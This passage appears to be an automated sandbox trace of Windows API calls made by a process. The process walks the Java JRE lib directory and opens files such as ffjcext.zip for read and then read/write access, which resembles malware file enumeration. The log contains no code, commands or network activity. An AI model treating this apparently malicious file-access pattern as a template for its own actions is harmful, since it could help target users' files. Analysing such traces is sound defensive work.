[0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.692] AreFileApisANSI () returned 1 [0094.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76110 [0094.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 53 [0094.692] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x101a)) returned 1 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.692] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa10e432c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="deploy", cAlternateFileName="")) returned 1 [0094.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0094.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0094.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0094.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0094.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0094.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0094.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0094.693] AreFileApisANSI () returned 1 [0094.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy", lpUsedDefaultChar=0x0) returned 46 [0094.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0094.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.693] AreFileApisANSI () returned 1 [0094.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0094.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71550 [0094.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x71550, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy") returned 46 [0094.693] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.693] GetLastError () returned 0x5 [0094.693] GetLastError () returned 0x5 [0094.693] SetLastError (dwErrCode=0x5) [0094.693] GetLastError () returned 0x5 [0094.693] SetLastError (dwErrCode=0x5) [0094.693] GetLastError () returned 0x5 [0094.693] SetLastError (dwErrCode=0x5) [0094.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0094.693] AreFileApisANSI () returned 1 [0094.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0094.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71828 [0094.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x71828, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy") returned 46 [0094.694] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.694] GetLastError () returned 0x5 [0094.694] GetLastError () returned 0x5 [0094.694] SetLastError (dwErrCode=0x5) [0094.694] GetLastError () returned 0x5 [0094.694] SetLastError (dwErrCode=0x5) [0094.694] GetLastError () returned 0x5 [0094.694] SetLastError (dwErrCode=0x5) [0094.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0094.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0094.694] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.694] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.694] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.694] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0094.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0094.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0094.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0094.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0094.694] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ed9405, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8ed9405, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa900a6f7, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ce7de, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="deploy.jar", cAlternateFileName="")) returned 1 [0094.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0094.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0094.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0094.695] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78750 [0094.838] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa10e432c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.844] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x374c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ffjcext.zip", cAlternateFileName="")) returned 1 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0094.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0094.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.845] AreFileApisANSI () returned 1 [0094.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip", lpUsedDefaultChar=0x0) returned 58 [0094.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0094.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.846] AreFileApisANSI () returned 1 [0094.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0094.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a9b0 [0094.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 58 [0094.846] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.847] GetFileType (hFile=0x368) returned 0x1 [0094.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0094.847] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.847] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.847] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.847] CloseHandle (hObject=0x368) returned 1 [0094.848] AreFileApisANSI () returned 1 [0094.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0094.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0094.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 58 [0094.848] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.848] GetFileType (hFile=0x368) returned 0x1 [0094.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0094.848] CloseHandle (hObject=0x368) returned 1 [0094.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.849] AreFileApisANSI () returned 1 [0094.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0094.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0094.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 58 [0094.849] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x374c)) returned 1 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0094.849] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | 